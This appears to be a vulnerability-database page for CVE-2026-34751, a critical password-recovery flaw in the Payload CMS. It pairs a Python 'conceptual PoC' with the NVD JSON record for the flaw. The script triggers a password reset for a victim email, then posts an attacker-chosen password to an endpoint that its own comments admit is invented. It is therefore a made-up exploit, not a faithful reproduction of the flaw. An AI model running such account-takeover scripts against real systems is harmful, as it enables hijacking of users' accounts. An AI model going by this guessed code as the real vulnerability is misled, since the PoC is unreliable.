CVE-2026-34751

import requests # Target URL target_url = "http://target-payload-cms.com" # Step 1: Trigger password reset for a victim user (attacker initiates or intercepts) # Note: The vulnerability allows the attacker to 'perform actions on behalf of a user who initiates a password reset' reset_endpoint = f"{target_url}/api/users/forgot-password" victim_email = "[email protected]" data = {"email": victim_email} # In a real scenario, the attacker might not need to initiate this if they can intercept, # or the vulnerability allows exploiting the token generation/validation logic directly. response = requests.post(reset_endpoint, json=data) print(f"Reset request status: {response.status_code}") # Step 2: Exploit the logic to perform an action (e.g., setting a new password without the token) # This is a conceptual PoC demonstrating the 'Authentication Bypass' aspect. # The specific endpoint would depend on the vulnerable API implementation. exploit_endpoint = f"{target_url}/api/users/reset-password-exploit" payload = { "email": victim_email, "newPassword": "attacker_controlled_password" } # If the vulnerability allows skipping token verification: exploit_response = requests.post(exploit_endpoint, json=payload) if exploit_response.status_code == 200: print("[+] Exploit successful! Password changed.") else: print("[-] Exploit failed.")

{"cve": {"id": "CVE-2026-34751", "sourceIdentifier": "[email protected]", "published": "2026-04-01T18:16:31.277", "lastModified": "2026-04-15T14:36:31.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Payload is a free and open source headless content management system. Prior to version 3.79.1 in @payloadcms/graphql and payload, a vulnerability in the password recovery flow could allow an unauthenticated attacker to perform actions on behalf of a user who initiates a password reset. This issue has been patched in version 3.79.1 for @payloadcms/graphql and payload."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-472"}, {"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:payloadcms:payload:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.79.1", "matchCriteriaId": "B4AE65F8-450D-4573-9CD7-1AA42CE5DC28"}]}]}], "references": [{"url": "https://github.com/payloadcms/payload/releases/tag/v3.79.1", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/payloadcms/payload/security/advisories/GHSA-hp5w-3hxx-vmwf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}